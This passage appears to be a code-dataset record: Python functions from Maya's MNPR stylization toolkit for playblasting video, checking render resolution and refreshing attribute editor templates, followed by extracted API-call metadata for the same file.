    workingRenderSize = cmds.getAttr("{0}.renderScale".format(mnpr_info.configNode))
    workingColorDepth = cmds.getAttr("{0}.colorDepth".format(mnpr_info.configNode))
    workingCamera = cmds.modelEditor(modelPanel, cam=True, q=True)
    workingCameraShape = cmds.listRelatives(workingCamera, s=True)
    if workingCameraShape:
        workingCameraShape = workingCameraShape[0]
    else:
        # we already have the shape
        workingCameraShape = workingCamera
    # set desired attributes: gamma on, HUD/UI operations off
    cmds.mnpr(g=True)
    mnprOperations = len(cmds.mnpr(lsO=True))
    cmds.mnpr(renderOperation=mnprOperations-1, s=0)  # HUD
    cmds.mnpr(renderOperation=mnprOperations-2, s=0)  # UI
    cmds.modelEditor(modelPanel, cam=renderCamera, e=True)  # change modelPanel
    lib.setAttr(mnpr_info.configNode, "renderScale", renderSize)
    lib.setAttr(mnpr_info.configNode, "colorDepth", 2)  # needs to be 32bit to avoid artefacts
    cmds.refresh()
    # try playblasting as QuickTime first, fall back to AVI
    try:
        cmds.playblast(f=saveDir, format="qt", w=width, h=height, percent=100, qlt=100, v=True, fo=True, os=True,
                       s=audioNode, compression="PNG")
    except RuntimeError:
        try:
            cmds.playblast(f=saveDir, format="avi", w=width, h=height, percent=100, qlt=100, v=True, fo=True, os=True,
                           s=audioNode)
        except RuntimeError:
            cmds.error("Video cannot be playblasted as qt or avi, please check the installed codecs.")
    # bring everything back to normal
    cmds.mnpr(renderOperation=mnprOperations-1, s=1)  # HUD
    cmds.mnpr(renderOperation=mnprOperations-2, s=1)  # UI
    cmds.modelEditor(modelPanel, cam=workingCameraShape, e=True)
    lib.setAttr(mnpr_info.configNode, "renderScale", workingRenderSize)
    lib.setAttr(mnpr_info.configNode, "colorDepth", workingColorDepth)
    cmds.mnpr(g=False)
    cmds.refresh()
    lib.printInfo("Video has been successfully playblasted to: {0}".format(saveDir))
def resolutionCheck(width, height, renderSize=1.0):
    """
    Checks if the resolution is within reasonable hardware limitations.

    Args:
        width (int): viewport width
        height (int): viewport height
        renderSize (float): render size (factor)

    Returns:
        renderSize (float): viable render size (factor)
    """
    # halve the supersampling factor until both axes fit the 16384 px limit
    while (width * renderSize > 16384) or (height * renderSize > 16384):
        cmds.warning("Resolution too high to supersample, reducing render size")
        renderSize = renderSize / 2.0
    # very large frames may take long or even crash Maya -> ask the user first
    if (width * height * renderSize ** 2) > 150000000:
        confirm = cmds.confirmDialog(title='Crash Warning',
                                   message='Rendering a frame at such high resolutions might take long and even crash Maya\nWould you like to continue anyway?',
                                   icn="warning", button=['Yes', 'No'], defaultButton='Yes',
                                   cancelButton='No', dismissString='No', ma='center')
        if confirm == 'No':
            cmds.error("Frame capture cancelled by user")
    return renderSize
def updateAE():
    """Refreshes the attribute editor templates.

    Returns:
        (bool): True when done
    """
    # force Maya to rebuild the AE templates (e.g. after a graph/config change)
    mel.eval("refreshEditorTemplates;")
    return True
| [
"maya.cmds.hyperShade",
"maya.cmds.flushUndo",
"mnpr_runner.openOverrideSettings",
"maya.cmds.about",
"coopLib.screenshot",
"coopLib.getActiveModelPanel",
"mnpr_info.loadPlugin",
"mnpr_runner.openPaintFX",
"coopLib.setAttr",
"mnpr_matPresets.setMaterialAttrs",
"maya.cmds.mnpr",
"maya.cmds.eval... | [((669, 691), 'mnpr_info.loadPlugin', 'mnpr_info.loadPlugin', ([], {}), '()\n', (689, 691), False, 'import mnpr_info\n'), ((2115, 2140), 'coopLib.getActiveModelPanel', 'lib.getActiveModelPanel', ([], {}), '()\n', (2138, 2140), True, 'import coopLib as lib\n'), ((2145, 2189), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['viewport'], {'dtx': '(True)', 'e': '(True)'}), '(viewport, dtx=True, e=True)\n', (2161, 2189), True, 'import maya.cmds as cmds\n'), ((2247, 2271), 'mnpr_info.loadRenderer', 'mnpr_info.loadRenderer', ([], {}), '()\n', (2269, 2271), False, 'import mnpr_info\n'), ((2316, 2361), 'maya.cmds.loadPlugin', 'cmds.loadPlugin', (['"""shaderFXPlugin"""'], {'quiet': '(True)'}), "('shaderFXPlugin', quiet=True)\n", (2331, 2361), True, 'import maya.cmds as cmds\n'), ((2369, 2396), 'maya.cmds.about', 'cmds.about', ([], {'nt': '(True)', 'q': '(True)'}), '(nt=True, q=True)\n', (2379, 2396), True, 'import maya.cmds as cmds\n'), ((2501, 2542), 'maya.cmds.loadPlugin', 'cmds.loadPlugin', (['"""glslShader"""'], {'quiet': '(True)'}), "('glslShader', quiet=True)\n", (2516, 2542), True, 'import maya.cmds as cmds\n'), ((2784, 2842), 'maya.cmds.displayColor', 'cmds.displayColor', (['"""headsUpDisplayLabels"""', '(2)'], {'dormant': '(True)'}), "('headsUpDisplayLabels', 2, dormant=True)\n", (2801, 2842), True, 'import maya.cmds as cmds\n'), ((2847, 2905), 'maya.cmds.displayColor', 'cmds.displayColor', (['"""headsUpDisplayValues"""', '(2)'], {'dormant': '(True)'}), "('headsUpDisplayValues', 2, dormant=True)\n", (2864, 2905), True, 'import maya.cmds as cmds\n'), ((3103, 3146), 'coopLib.printInfo', 'lib.printInfo', (['"""-> SYSTEM CHECK SUCCESSFUL"""'], {}), "('-> SYSTEM CHECK SUCCESSFUL')\n", (3116, 3146), True, 'import coopLib as lib\n'), ((3238, 3270), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'resetStylization': '(True)'}), '(resetStylization=True)\n', (3247, 3270), True, 'import maya.cmds as cmds\n'), ((3308, 3344), 'maya.cmds.objExists', 'cmds.objExists', 
(['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (3322, 3344), True, 'import maya.cmds as cmds\n'), ((3409, 3425), 'maya.cmds.flushUndo', 'cmds.flushUndo', ([], {}), '()\n', (3423, 3425), True, 'import maya.cmds as cmds\n'), ((3479, 3498), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'rn': '(False)'}), '(rn=False)\n', (3488, 3498), True, 'import maya.cmds as cmds\n'), ((3523, 3541), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'rn': '(True)'}), '(rn=True)\n', (3532, 3541), True, 'import maya.cmds as cmds\n'), ((3619, 3645), 'mnpr_runner.reloadConfig', 'mnpr_runner.reloadConfig', ([], {}), '()\n', (3643, 3645), False, 'import mnpr_runner\n'), ((3694, 3723), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'style': '(True)', 'q': '(True)'}), '(style=True, q=True)\n', (3703, 3723), True, 'import maya.cmds as cmds\n'), ((3778, 3836), 'maya.cmds.window', 'cmds.window', (['mnpr_UIs.BreakdownUI.windowTitle'], {'exists': '(True)'}), '(mnpr_UIs.BreakdownUI.windowTitle, exists=True)\n', (3789, 3836), True, 'import maya.cmds as cmds\n'), ((3919, 3975), 'maya.cmds.window', 'cmds.window', (['mnpr_FX.MNPR_FX_UI.windowTitle'], {'exists': '(True)'}), '(mnpr_FX.MNPR_FX_UI.windowTitle, exists=True)\n', (3930, 3975), True, 'import maya.cmds as cmds\n'), ((4028, 4058), 'coopLib.printInfo', 'lib.printInfo', (['"""Style changed"""'], {}), "('Style changed')\n", (4041, 4058), True, 'import coopLib as lib\n'), ((4719, 4763), 'maya.cmds.pluginInfo', 'cmds.pluginInfo', (['plugin'], {'loaded': '(True)', 'q': '(True)'}), '(plugin, loaded=True, q=True)\n', (4734, 4763), True, 'import maya.cmds as cmds\n'), ((5157, 5173), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (5164, 5173), True, 'import maya.cmds as cmds\n'), ((5916, 5950), 'coopLib.printInfo', 'lib.printInfo', (['"""Shaders refreshed"""'], {}), "('Shaders refreshed')\n", (5929, 5950), True, 'import coopLib as lib\n'), ((6080, 6110), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""ShaderfxShader"""'}), "(type='ShaderfxShader')\n", 
(6087, 6110), True, 'import maya.cmds as cmds\n'), ((6688, 6720), 'coopLib.printInfo', 'lib.printInfo', (['"""Shaders updated"""'], {}), "('Shaders updated')\n", (6701, 6720), True, 'import coopLib as lib\n'), ((6824, 6850), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""dx11Shader"""'}), "(type='dx11Shader')\n", (6831, 6850), True, 'import maya.cmds as cmds\n'), ((9450, 9476), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""dx11Shader"""'}), "(type='dx11Shader')\n", (9457, 9476), True, 'import maya.cmds as cmds\n'), ((12118, 12146), 'maya.cmds.delete', 'cmds.delete', (['prototypeCNodes'], {}), '(prototypeCNodes)\n', (12129, 12146), True, 'import maya.cmds as cmds\n'), ((12433, 12462), 'os.path.join', 'os.path.join', (['rootDir', 'folder'], {}), '(rootDir, folder)\n', (12445, 12462), False, 'import os\n'), ((12590, 12617), 'maya.cmds.objExists', 'cmds.objExists', (['"""NPRConfig"""'], {}), "('NPRConfig')\n", (12604, 12617), True, 'import maya.cmds as cmds\n'), ((13279, 13313), 'maya.cmds.evaluationManager', 'cmds.evaluationManager', ([], {'mode': '"""off"""'}), "(mode='off')\n", (13301, 13313), True, 'import maya.cmds as cmds\n'), ((14399, 14416), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(True)'}), '(g=True)\n', (14408, 14416), True, 'import maya.cmds as cmds\n'), ((14487, 14537), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(0)'}), '(renderOperation=mnprOperations - 1, s=0)\n', (14496, 14537), True, 'import maya.cmds as cmds\n'), ((14547, 14597), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(0)'}), '(renderOperation=mnprOperations - 2, s=0)\n', (14556, 14597), True, 'import maya.cmds as cmds\n'), ((14606, 14620), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (14618, 14620), True, 'import maya.cmds as cmds\n'), ((15896, 15932), 'maya.mel.eval', 'mel.eval', (['"""$tmpVar=$gPlayBackSlider"""'], {}), "('$tmpVar=$gPlayBackSlider')\n", (15904, 15932), True, 'import maya.mel as 
mel\n'), ((15949, 16004), 'maya.cmds.timeControl', 'cmds.timeControl', (['aPlayBackSliderPython'], {'q': '(True)', 's': '(True)'}), '(aPlayBackSliderPython, q=True, s=True)\n', (15965, 16004), True, 'import maya.cmds as cmds\n'), ((16252, 16298), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['modelPanel'], {'cam': '(True)', 'q': '(True)'}), '(modelPanel, cam=True, q=True)\n', (16268, 16298), True, 'import maya.cmds as cmds\n'), ((16324, 16365), 'maya.cmds.listRelatives', 'cmds.listRelatives', (['workingCamera'], {'s': '(True)'}), '(workingCamera, s=True)\n', (16342, 16365), True, 'import maya.cmds as cmds\n'), ((16572, 16589), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(True)'}), '(g=True)\n', (16581, 16589), True, 'import maya.cmds as cmds\n'), ((16640, 16690), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(0)'}), '(renderOperation=mnprOperations - 1, s=0)\n', (16649, 16690), True, 'import maya.cmds as cmds\n'), ((16700, 16750), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(0)'}), '(renderOperation=mnprOperations - 2, s=0)\n', (16709, 16750), True, 'import maya.cmds as cmds\n'), ((16759, 16813), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['modelPanel'], {'cam': 'renderCamera', 'e': '(True)'}), '(modelPanel, cam=renderCamera, e=True)\n', (16775, 16813), True, 'import maya.cmds as cmds\n'), ((16839, 16899), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'renderSize'], {}), "(mnpr_info.configNode, 'renderScale', renderSize)\n", (16850, 16899), True, 'import coopLib as lib\n'), ((16904, 16954), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', '(2)'], {}), "(mnpr_info.configNode, 'colorDepth', 2)\n", (16915, 16954), True, 'import coopLib as lib\n'), ((16999, 17013), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (17011, 17013), True, 'import maya.cmds as cmds\n'), ((17588, 17638), 'maya.cmds.mnpr', 'cmds.mnpr', 
([], {'renderOperation': '(mnprOperations - 1)', 's': '(1)'}), '(renderOperation=mnprOperations - 1, s=1)\n', (17597, 17638), True, 'import maya.cmds as cmds\n'), ((17648, 17698), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(1)'}), '(renderOperation=mnprOperations - 2, s=1)\n', (17657, 17698), True, 'import maya.cmds as cmds\n'), ((17707, 17767), 'maya.cmds.modelEditor', 'cmds.modelEditor', (['modelPanel'], {'cam': 'workingCameraShape', 'e': '(True)'}), '(modelPanel, cam=workingCameraShape, e=True)\n', (17723, 17767), True, 'import maya.cmds as cmds\n'), ((17772, 17839), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'workingRenderSize'], {}), "(mnpr_info.configNode, 'renderScale', workingRenderSize)\n", (17783, 17839), True, 'import coopLib as lib\n'), ((17844, 17910), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', 'workingColorDepth'], {}), "(mnpr_info.configNode, 'colorDepth', workingColorDepth)\n", (17855, 17910), True, 'import coopLib as lib\n'), ((17915, 17933), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(False)'}), '(g=False)\n', (17924, 17933), True, 'import maya.cmds as cmds\n'), ((17938, 17952), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (17950, 17952), True, 'import maya.cmds as cmds\n'), ((19220, 19255), 'maya.mel.eval', 'mel.eval', (['"""refreshEditorTemplates;"""'], {}), "('refreshEditorTemplates;')\n", (19228, 19255), True, 'import maya.mel as mel\n'), ((2406, 2447), 'maya.cmds.loadPlugin', 'cmds.loadPlugin', (['"""dx11Shader"""'], {'quiet': '(True)'}), "('dx11Shader', quiet=True)\n", (2421, 2447), True, 'import maya.cmds as cmds\n'), ((2955, 2991), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (2969, 2991), True, 'import maya.cmds as cmds\n'), ((3012, 3036), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)', 'l': '(True)'}), '(sl=True, l=True)\n', (3019, 3036), True, 'import 
maya.cmds as cmds\n'), ((3068, 3097), 'maya.cmds.select', 'cmds.select', (['selected'], {'r': '(True)'}), '(selected, r=True)\n', (3079, 3097), True, 'import maya.cmds as cmds\n'), ((3354, 3387), 'maya.cmds.delete', 'cmds.delete', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (3365, 3387), True, 'import maya.cmds as cmds\n'), ((3846, 3892), 'mnpr_runner.openOverrideSettings', 'mnpr_runner.openOverrideSettings', ([], {'rebuild': '(True)'}), '(rebuild=True)\n', (3878, 3892), False, 'import mnpr_runner\n'), ((3985, 4022), 'mnpr_runner.openPaintFX', 'mnpr_runner.openPaintFX', ([], {'rebuild': '(True)'}), '(rebuild=True)\n', (4008, 4022), False, 'import mnpr_runner\n'), ((4374, 4431), 'maya.cmds.pluginInfo', 'cmds.pluginInfo', (['mnpr_info.prototype'], {'loaded': '(True)', 'q': '(True)'}), '(mnpr_info.prototype, loaded=True, q=True)\n', (4389, 4431), True, 'import maya.cmds as cmds\n'), ((4811, 4847), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (4825, 4847), True, 'import maya.cmds as cmds\n'), ((4925, 4941), 'maya.cmds.flushUndo', 'cmds.flushUndo', ([], {}), '()\n', (4939, 4941), True, 'import maya.cmds as cmds\n'), ((4970, 4995), 'maya.cmds.unloadPlugin', 'cmds.unloadPlugin', (['plugin'], {}), '(plugin)\n', (4987, 4995), True, 'import maya.cmds as cmds\n'), ((5021, 5068), 'coopLib.printInfo', 'lib.printInfo', (['"""->PLUGIN SUCCESSFULLY UNLOADED"""'], {}), "('->PLUGIN SUCCESSFULLY UNLOADED')\n", (5034, 5068), True, 'import coopLib as lib\n'), ((5183, 5208), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'smn': '(True)'}), '(smn=True)\n', (5198, 5208), True, 'import maya.cmds as cmds\n'), ((5217, 5241), 'maya.mel.eval', 'mel.eval', (['"""openAEWindow"""'], {}), "('openAEWindow')\n", (5225, 5241), True, 'import maya.mel as mel\n'), ((5260, 5301), 'maya.cmds.warning', 'cmds.warning', (['"""Select object with shader"""'], {}), "('Select object with shader')\n", (5272, 5301), True, 'import maya.cmds 
as cmds\n'), ((5491, 5531), 'os.path.join', 'os.path.join', (['shaderDir', '"""PrototypeC.fx"""'], {}), "(shaderDir, 'PrototypeC.fx')\n", (5503, 5531), False, 'import os\n'), ((5660, 5686), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""dx11Shader"""'}), "(type='dx11Shader')\n", (5667, 5686), True, 'import maya.cmds as cmds\n'), ((5718, 5761), 'os.path.join', 'os.path.join', (['shaderDir', '"""PrototypeC.ogsfx"""'], {}), "(shaderDir, 'PrototypeC.ogsfx')\n", (5730, 5761), False, 'import os\n'), ((5780, 5806), 'maya.cmds.ls', 'cmds.ls', ([], {'type': '"""GLSLShader"""'}), "(type='GLSLShader')\n", (5787, 5806), True, 'import maya.cmds as cmds\n'), ((6240, 6287), 'mnpr_matPresets.getMaterialAttrs', 'mnpr_matPresets.getMaterialAttrs', (['mat', 'matAttrs'], {}), '(mat, matAttrs)\n', (6272, 6287), False, 'import mnpr_matPresets\n'), ((6404, 6452), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'mat', 'loadGraph': 'shaderFile'}), '(sfxnode=mat, loadGraph=shaderFile)\n', (6417, 6452), True, 'import maya.cmds as cmds\n'), ((6487, 6534), 'mnpr_matPresets.setMaterialAttrs', 'mnpr_matPresets.setMaterialAttrs', (['mat', 'matAttrs'], {}), '(mat, matAttrs)\n', (6519, 6534), False, 'import mnpr_matPresets\n'), ((7018, 7069), 'maya.cmds.listAttr', 'cmds.listAttr', (['dx11Shader'], {'ud': '(True)', 'st': '"""x*"""', 'k': '(True)'}), "(dx11Shader, ud=True, st='x*', k=True)\n", (7031, 7069), True, 'import maya.cmds as cmds\n'), ((7155, 7213), 'maya.cmds.listConnections', 'cmds.listConnections', (['dx11Shader'], {'t': '"""file"""', 'c': '(True)', 'p': '(True)'}), "(dx11Shader, t='file', c=True, p=True)\n", (7175, 7213), True, 'import maya.cmds as cmds\n'), ((7277, 7308), 'maya.cmds.select', 'cmds.select', (['dx11Shader'], {'r': '(True)'}), '(dx11Shader, r=True)\n', (7288, 7308), True, 'import maya.cmds as cmds\n'), ((7317, 7344), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'objects': '""""""'}), "(objects='')\n", (7332, 7344), True, 'import maya.cmds as cmds\n'), ((7362, 
7378), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (7369, 7378), True, 'import maya.cmds as cmds\n'), ((7537, 7564), 'maya.cmds.select', 'cmds.select', (['shapes'], {'r': '(True)'}), '(shapes, r=True)\n', (7548, 7564), True, 'import maya.cmds as cmds\n'), ((7573, 7603), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'assign': 'shader'}), '(assign=shader)\n', (7588, 7603), True, 'import maya.cmds as cmds\n'), ((7708, 7774), 'os.path.join', 'os.path.join', (['mnpr_info.environment', '"""shaders"""', '"""PrototypeC.ogsfx"""'], {}), "(mnpr_info.environment, 'shaders', 'PrototypeC.ogsfx')\n", (7720, 7774), False, 'import os\n'), ((8699, 8757), 'maya.cmds.attributeQuery', 'cmds.attributeQuery', (['"""Color0_Source"""'], {'node': 'shader', 'ex': '(True)'}), "('Color0_Source', node=shader, ex=True)\n", (8718, 8757), True, 'import maya.cmds as cmds\n'), ((8868, 8926), 'maya.cmds.attributeQuery', 'cmds.attributeQuery', (['"""Color1_Source"""'], {'node': 'shader', 'ex': '(True)'}), "('Color1_Source', node=shader, ex=True)\n", (8887, 8926), True, 'import maya.cmds as cmds\n'), ((9037, 9095), 'maya.cmds.attributeQuery', 'cmds.attributeQuery', (['"""Color2_Source"""'], {'node': 'shader', 'ex': '(True)'}), "('Color2_Source', node=shader, ex=True)\n", (9056, 9095), True, 'import maya.cmds as cmds\n'), ((9819, 9870), 'maya.cmds.listAttr', 'cmds.listAttr', (['dx11Shader'], {'ud': '(True)', 'st': '"""x*"""', 'k': '(True)'}), "(dx11Shader, ud=True, st='x*', k=True)\n", (9832, 9870), True, 'import maya.cmds as cmds\n'), ((9956, 10006), 'maya.cmds.listConnections', 'cmds.listConnections', (['dx11Shader'], {'t': '"""file"""', 'c': '(True)'}), "(dx11Shader, t='file', c=True)\n", (9976, 10006), True, 'import maya.cmds as cmds\n'), ((10070, 10101), 'maya.cmds.select', 'cmds.select', (['dx11Shader'], {'r': '(True)'}), '(dx11Shader, r=True)\n', (10081, 10101), True, 'import maya.cmds as cmds\n'), ((10110, 10137), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], 
{'objects': '""""""'}), "(objects='')\n", (10125, 10137), True, 'import maya.cmds as cmds\n'), ((10155, 10171), 'maya.cmds.ls', 'cmds.ls', ([], {'sl': '(True)'}), '(sl=True)\n', (10162, 10171), True, 'import maya.cmds as cmds\n'), ((10357, 10384), 'maya.cmds.select', 'cmds.select', (['shapes'], {'r': '(True)'}), '(shapes, r=True)\n', (10368, 10384), True, 'import maya.cmds as cmds\n'), ((10393, 10423), 'maya.cmds.hyperShade', 'cmds.hyperShade', ([], {'assign': 'shader'}), '(assign=shader)\n', (10408, 10423), True, 'import maya.cmds as cmds\n'), ((10525, 10576), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'loadGraph': 'shaderFile'}), '(sfxnode=shader, loadGraph=shaderFile)\n', (10538, 10576), True, 'import maya.cmds as cmds\n'), ((12627, 12651), 'maya.cmds.delete', 'cmds.delete', (['"""NPRConfig"""'], {}), "('NPRConfig')\n", (12638, 12651), True, 'import maya.cmds as cmds\n'), ((12664, 12700), 'maya.cmds.objExists', 'cmds.objExists', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (12678, 12700), True, 'import maya.cmds as cmds\n'), ((12746, 12799), 'maya.cmds.createNode', 'cmds.createNode', (['"""mnprConfig"""'], {'n': 'mnpr_info.configNode'}), "('mnprConfig', n=mnpr_info.configNode)\n", (12761, 12799), True, 'import maya.cmds as cmds\n'), ((12907, 12934), 'maya.mel.eval', 'mel.eval', (['"""AttributeEditor"""'], {}), "('AttributeEditor')\n", (12915, 12934), True, 'import maya.mel as mel\n'), ((12943, 12996), 'coopLib.printInfo', 'lib.printInfo', (['"""-> CONFIG NODE CREATED AND CONNECTED"""'], {}), "('-> CONFIG NODE CREATED AND CONNECTED')\n", (12956, 12996), True, 'import coopLib as lib\n'), ((13015, 13048), 'maya.cmds.select', 'cmds.select', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (13026, 13048), True, 'import maya.cmds as cmds\n'), ((13057, 13084), 'maya.mel.eval', 'mel.eval', (['"""AttributeEditor"""'], {}), "('AttributeEditor')\n", (13065, 13084), True, 'import maya.mel as mel\n'), ((14212, 14262), 
'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', '(2)'], {}), "(mnpr_info.configNode, 'colorDepth', 2)\n", (14223, 14262), True, 'import coopLib as lib\n'), ((14311, 14371), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'renderSize'], {}), "(mnpr_info.configNode, 'renderScale', renderSize)\n", (14322, 14371), True, 'import coopLib as lib\n'), ((14462, 14481), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'lsO': '(True)'}), '(lsO=True)\n', (14471, 14481), True, 'import maya.cmds as cmds\n'), ((14675, 14750), 'coopLib.screenshot', 'lib.screenshot', (['saveDir', 'width', 'height'], {'format': 'imgFormat', 'override': 'override'}), '(saveDir, width, height, format=imgFormat, override=override)\n', (14689, 14750), True, 'import coopLib as lib\n'), ((14966, 15016), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 1)', 's': '(1)'}), '(renderOperation=mnprOperations - 1, s=1)\n', (14975, 15016), True, 'import maya.cmds as cmds\n'), ((15030, 15080), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'renderOperation': '(mnprOperations - 2)', 's': '(1)'}), '(renderOperation=mnprOperations - 2, s=1)\n', (15039, 15080), True, 'import maya.cmds as cmds\n'), ((15093, 15160), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""renderScale"""', 'workingRenderSize'], {}), "(mnpr_info.configNode, 'renderScale', workingRenderSize)\n", (15104, 15160), True, 'import coopLib as lib\n'), ((15169, 15235), 'coopLib.setAttr', 'lib.setAttr', (['mnpr_info.configNode', '"""colorDepth"""', 'workingColorDepth'], {}), "(mnpr_info.configNode, 'colorDepth', workingColorDepth)\n", (15180, 15235), True, 'import coopLib as lib\n'), ((15244, 15262), 'maya.cmds.mnpr', 'cmds.mnpr', ([], {'g': '(False)'}), '(g=False)\n', (15253, 15262), True, 'import maya.cmds as cmds\n'), ((15271, 15285), 'maya.cmds.refresh', 'cmds.refresh', ([], {}), '()\n', (15283, 15285), True, 'import maya.cmds as cmds\n'), ((16615, 16634), 
'maya.cmds.mnpr', 'cmds.mnpr', ([], {'lsO': '(True)'}), '(lsO=True)\n', (16624, 16634), True, 'import maya.cmds as cmds\n'), ((17055, 17197), 'maya.cmds.playblast', 'cmds.playblast', ([], {'f': 'saveDir', 'format': '"""qt"""', 'w': 'width', 'h': 'height', 'percent': '(100)', 'qlt': '(100)', 'v': '(True)', 'fo': '(True)', 'os': '(True)', 's': 'audioNode', 'compression': '"""PNG"""'}), "(f=saveDir, format='qt', w=width, h=height, percent=100, qlt=\n 100, v=True, fo=True, os=True, s=audioNode, compression='PNG')\n", (17069, 17197), True, 'import maya.cmds as cmds\n'), ((18452, 18524), 'maya.cmds.warning', 'cmds.warning', (['"""Resolution too high to supersample, reducing render size"""'], {}), "('Resolution too high to supersample, reducing render size')\n", (18464, 18524), True, 'import maya.cmds as cmds\n'), ((4861, 4894), 'maya.cmds.delete', 'cmds.delete', (['mnpr_info.configNode'], {}), '(mnpr_info.configNode)\n', (4872, 4894), True, 'import maya.cmds as cmds\n'), ((5547, 5573), 'os.path.isfile', 'os.path.isfile', (['shaderFile'], {}), '(shaderFile)\n', (5561, 5573), False, 'import os\n'), ((5600, 5641), 'os.path.join', 'os.path.join', (['shaderDir', '"""prototypeC.fxo"""'], {}), "(shaderDir, 'prototypeC.fxo')\n", (5612, 5641), False, 'import os\n'), ((10787, 10847), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'getNodeIDByName': '"""vtxControls"""'}), "(sfxnode=shader, getNodeIDByName='vtxControls')\n", (10800, 10847), True, 'import maya.cmds as cmds\n'), ((10860, 10930), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'edit_bool': "(nodeId, 'value', vtxControl)"}), "(sfxnode=shader, edit_bool=(nodeId, 'value', vtxControl))\n", (10873, 10930), True, 'import maya.cmds as cmds\n'), ((11058, 11113), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'getNodeIDByName': '"""Shadow"""'}), "(sfxnode=shader, getNodeIDByName='Shadow')\n", (11071, 11113), True, 'import maya.cmds as cmds\n'), ((11126, 11193), 
'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'edit_bool': "(nodeId, 'value', shadows)"}), "(sfxnode=shader, edit_bool=(nodeId, 'value', shadows))\n", (11139, 11193), True, 'import maya.cmds as cmds\n'), ((11323, 11383), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'getNodeIDByName': '"""Specularity"""'}), "(sfxnode=shader, getNodeIDByName='Specularity')\n", (11336, 11383), True, 'import maya.cmds as cmds\n'), ((11396, 11467), 'maya.cmds.shaderfx', 'cmds.shaderfx', ([], {'sfxnode': 'shader', 'edit_bool': "(nodeId, 'value', specularity)"}), "(sfxnode=shader, edit_bool=(nodeId, 'value', specularity))\n", (11409, 11467), True, 'import maya.cmds as cmds\n'), ((12393, 12419), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (12409, 12419), False, 'import os\n'), ((14869, 14890), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (14888, 14890), False, 'import traceback\n'), ((18681, 18975), 'maya.cmds.confirmDialog', 'cmds.confirmDialog', ([], {'title': '"""Crash Warning"""', 'message': '"""Rendering a frame at such high resolutions might take long and even crash Maya\nWould you like to continue anyway?"""', 'icn': '"""warning"""', 'button': "['Yes', 'No']", 'defaultButton': '"""Yes"""', 'cancelButton': '"""No"""', 'dismissString': '"""No"""', 'ma': '"""center"""'}), '(title=\'Crash Warning\', message=\n """Rendering a frame at such high resolutions might take long and even crash Maya\nWould you like to continue anyway?"""\n , icn=\'warning\', button=[\'Yes\', \'No\'], defaultButton=\'Yes\',\n cancelButton=\'No\', dismissString=\'No\', ma=\'center\')\n', (18699, 18975), True, 'import maya.cmds as cmds\n'), ((11707, 11751), 'coopLib.setAttr', 'lib.setAttr', (['shader', 'dx2sfxAttr[attr]', 'value'], {}), '(shader, dx2sfxAttr[attr], value)\n', (11718, 11751), True, 'import coopLib as lib\n'), ((12031, 12080), 'coopLib.setAttr', 